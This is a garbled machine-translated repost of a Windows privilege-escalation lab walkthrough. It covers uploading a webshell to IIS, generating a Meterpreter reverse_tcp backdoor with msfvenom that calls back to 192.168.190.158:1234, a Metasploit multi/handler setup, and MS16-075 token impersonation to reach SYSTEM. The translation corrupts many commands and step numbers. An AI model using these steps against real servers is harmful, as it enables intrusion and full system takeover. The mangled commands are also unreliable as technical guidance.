2019年12月10日:win7のは、実際に権利を言及win12

A、win7の

1は、アクセス、サーバーにアップロードウェブシェル

 

任意のコマンドへのリードを実行することができ、win7のアクセス権が設定されていないので2、

 

 

右への直接参照を使用して、またMSFツールによってEXP使用する権利を提供することができ、成功するために、今日ではやって手遅れ

二、win2012

書かれた1は、Webサーバ上でマレーシアを置きます

 

2、正常に実行にwhoamiテストマシン訪問マレーシア、実行、アカウントは、IISサービスです

 

図3に示すように、パッチ情報を取得するためにシステムのシステムサーバ・システムを実行します

 

4、何の成功を追加していない/ネットユーザーを使用して、ユーザーを表示することができ、ネットユーザーにしてみてください

 

6、テストスクリプト読み書きできるスクリプトを使用してアップロードディレクトリ、読み書き可能なディレクトリアウトテスト

 

7、msfvenom生成されたバックドアのリスニングポートを使用して

msfvenom -p窓/ meterpreter / reverse_tcp lhost = 192.168.190.158 lportは= 1234 -f exeファイル-o ./hack.exeバックドア、アップロードを生成します

 

実施を監視

1)使用は/マルチ/ハンドラを利用します

2)セットペイロードの窓/ meterpreter / reverse_tcp

3)LHOST 192.168.190.158セットを設定します

4)lportは1234年

5)エクスプロイト

 

右のはもちろんのこと、ターゲットサーバ上のHack.exeプログラムの実行

 

8、正常に受信されたセッション

 

図9は、msf16-075の使用は、以下のコマンドを実行した後、右に置くこと

使用お忍び

list_tokens -u

-cH -f ./potato.exeを実行します

 

10は、特権を、

ms16-075言及右のプログラムを実行した後、再度、次のコマンドを実行NT AUTHORITYSYSTEM権限に現在のユーザー権限を取得します。

list_tokens -u

"NT AUTHORITYSYSTEM" impersonate_token

guyed

成功する権利を言及

 

 完成

おすすめ

転載: www.cnblogs.com/sym945/p/12019689.html